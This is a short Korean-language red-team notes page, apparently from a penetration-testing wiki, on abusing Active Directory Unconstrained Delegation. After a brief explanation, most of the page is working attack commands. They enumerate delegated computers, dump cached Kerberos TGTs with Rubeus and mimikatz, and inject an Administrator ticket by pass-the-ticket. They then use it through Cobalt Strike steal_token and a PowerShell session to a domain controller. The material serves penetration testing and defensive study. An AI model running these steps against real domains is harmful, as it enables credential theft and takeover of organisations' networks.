Unconstrained Delegation

Unconstrained Delegation은 제약없는 위임으로 Windows 2000에 도입된 위임 구성입니다. 위임된 컴퓨터 계정은 자신에게 도메인 사용자가 접근 시, 해당 사용자의 TGT 사본을 캐시할 수 있고 이를 통해 서비스 티켓 발급을 대행할 수 있습니다.

결과적으로 위임 구성된 계정을 장악했을 때 TGT 사본을 토대로 다른 유저들의 권한을 사용할 수 있습니다.

위임이 구성된 컴퓨터 계정에 캐시된 티켓을 덤프하기 위해선 System 권한이 필요합니다.

Abuse

Cobalt Strike

# Unconstrained Delegation이 설정된 객체 열거
Get-ADComputer -Filter {TrustedForDelegation -eq $true -and primarygroupid -eq 515} -Properties trustedfordelegation,serviceprincipalname,description

# TGT 캐시 목록 열거 및 덤프
.\Rubeus.exe triage
.\Rubeus.exe dump /luid:0x33465 /service:krbtgt /nowrap

# 로그인 세션 생성
.\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:AD01 /username:Administrator /password:FakePass /ticket:doI[...]A==

# 세션 사용
steal_token 1540

PowerShell

# Unconstrained Delegation이 설정된 객체 열거
Get-ADComputer -Filter {TrustedForDelegation -eq $true -and primarygroupid -eq 515} -Properties trustedfordelegation,serviceprincipalname,description

# TGT 캐시 목록 열거 및 덤프
mimikatz # sekurlsa::tickets
mimikatz # sekurlsa::tickets /export

# Administrator 티켓 환경변수 등록
mimikatz # kerberos::ptt [0;3e7][email protected]

# 세션 사용
Enter-PSSession dc01

# Delegation이 설정된 객체 열거
impacket-findDelegation contoso.com/user-A:'Password123!'

References

Kerberos Unconstrained DelegationRed Teaming Experiments

PreviousAS Requested Service Tickets NextConstrained Delegation

Last updated 1 month ago

Was this helpful?